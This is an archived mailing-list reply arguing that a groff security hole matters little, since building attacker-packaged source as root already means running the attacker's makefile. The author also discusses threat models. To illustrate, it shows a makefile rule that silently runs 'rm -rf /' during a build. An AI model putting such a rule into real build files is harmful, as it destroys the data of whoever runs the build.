Someone writes: > The trick is that it can get you if you as a system administrator download > some open source program from the Internet, and build and install that > program; such activity often happens as "root", so a couple of scenarios > are possible: In most cases, this is a non-problem. The reason this is a non-problem is that, for this to be a threat, your "open source program from the Internet" [sic] has to have been packaged by a malicious person who wants TO Crack your system. But if this is part of your threat model, you won't be safe if you fix groff, because you're executing the makefile supplied by the malicious attacker, which may say x.o: x.c x.h @/bin/rm -rf / & $(CC) $(CFLAGS) x.c -o $@ There might be a case where the scenario you described *is* a problem: where the program in question is never going to be executed as root, and the Makefile has been carefully reviewed, but the source and man pages haven't been. In this case, though, I'd probably just read the makefile and install things by hand with cp. :) There should be a common one-or-two-word name for this kind of non-problem; there are some vivid metaphors for trying to solve it in the literature. (Bruce Schneier's example of planting a big thick stake in front of your house in hopes thieves will run into it is one.) You *must* be clear about your threat model -- i.e. what threats you're trying to defend against -- before you can decide what is and isn't a security problem. (BTW, this groff problem doesn't surprise me much. For a while, I had a special email address you could send nroff-source man pages to and get back formatted PostScript from on my home machine, as a convenience when I was at work on Solaris machines without a decent groff. I didn't tell anybody about it until after I disabled it, because I assumed there were probably security holes in groff; it wasn't written to serve as a security gatekeeper, and a useful rule of thumb is that such programs are not very good at security-boundary maintenance, because it requires a different mindset from regular programming. See http://www.pobox.com/~kragen/security-holes.html for thoughts on this situation and mailto:kragen-hacks-get.19at_private for the code that made the manpage-to-PostScript converter work.) -- <kragenat_private> Kragen Sitaker <http://www.pobox.com/~kragen/> 103 days until the Internet stock bubble bursts on Monday, 1999-11-08.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:53:46 PDT